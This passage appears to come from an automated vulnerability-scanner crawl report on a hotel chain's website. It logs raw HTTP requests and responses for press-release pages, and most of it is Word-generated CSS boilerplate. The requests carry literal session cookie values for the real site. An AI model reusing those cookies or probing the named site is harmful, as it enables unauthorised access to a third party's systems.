mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Symbol;}
@list l4:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l5
{mso-list-id:1566069662;
mso-list-type:hybrid;
mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0FC;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l6
{mso-list-id:1636525908;
mso-list-type:hybrid;
mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l7
{mso-list-id:1765494741;
mso-list-type:hybrid;
mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-hansi-font-family:Calibri;}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="2050"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>

<body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'>

<div class=Section1>

<p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"..
- /pdfs/press/html/HRC-1109/

/pdfs/press/html/HRC-1109/

http://www.kimptonhotels.com/pdfs/press/html/HRC-1109/

Request

GET /pdfs/press/html/HRC-1109/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/HRC-1109/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 36781
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>4</o:TotalTime>
<o:LastPrinted>2009-11-18T19:40:00Z</o:LastPrinted>
<o:Created>2010-01-04T21:51:00Z</o:Created>
<o:LastSaved>2010-01-04T21:51:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>703</o:Words>
<o:Characters>4008</o:Characters>
<o:Lines>33</o:Lines>
<o:Paragraphs>8</o:Paragraphs>
<o:CharactersWithSpaces>4922</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
h2
{mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0in;
margin-bottom:3.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:2;
font-size:14.0pt;
font-family:Arial;
mso-bidi-font-family:Arial;
mso-bidi-font-weight:bold;
font-style:italic;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
em
{mso-bidi-font-style:italic;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
span.emailstyle17
{mso-style-name:emailstyle17;
mso-style-noshow:yes;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:windowtext;}
span.kim10
{mso-style-name:kim10;}
p.p12, li.p12, div.p12
{mso-style-name:p12;
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:"Times New Roman";}
span.MarlieseEngel
{mso-style-name:"Marliese Engel";
mso-style-noshow:yes;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;
font-weight:normal;
font-style:normal;
text-decoration:none;
text-underline:none;
text-decoration:none;
text-line-through:none;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:1007153;
mso-list-type:hybrid;
mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.25in;
mso-level-number-position:left;
margin-left:.25in;
text-indent:-.25in;
mso-ansi-font-size:8.0pt;
font-family:Symbol;}
@list l2
{mso-list-id:102651134;
mso-list-type:hybrid;
mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:154613679;
mso-list-type:hybrid;
mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4
{mso-list-id:533346185;
mso-list-type:hybrid;
mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}
@list l4:level1
{mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l5
{mso-list-id:762846213;
mso-list-type:hybrid;
mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6
{mso-list-id:973101145;
mso-list-type:hybrid;
mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l7
{mso-list-id:1030841178;
mso-list-type:hybrid;
mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Times;}
@list l7:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l7:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l8
{mso-list-id:1089353841;
mso-list-template-ids:-304692582;}
@list l8:level1
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso..
- /pdfs/press/html/MMHIQ3-1209/

/pdfs/press/html/MMHIQ3-1209/

http://www.kimptonhotels.com/pdfs/press/html/MMHIQ3-1209/

Request

GET /pdfs/press/html/MMHIQ3-1209/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/MMHIQ3-1209/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 22734
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>Marliese Engel</o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>2</o:TotalTime>
<o:LastPrinted>2009-09-15T00:58:00Z</o:LastPrinted>
<o:Created>2010-01-04T21:54:00Z</o:Created>
<o:LastSaved>2010-01-04T21:54:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>815</o:Words>
<o:Characters>4649</o:Characters>
<o:Company>Baltz &amp; Company</o:Company>
<o:Lines>38</o:Lines>
<o:Paragraphs>9</o:Paragraphs>
<o:CharactersWithSpaces>5709</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:DontGrowAutofit/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
h1
{mso-style-link:"Heading 1 Char";
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
mso-bidi-font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{mso-style-noshow:yes;
mso-style-link:"Plain Text Char";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:24.0pt;
font-family:"Arial Unicode MS";
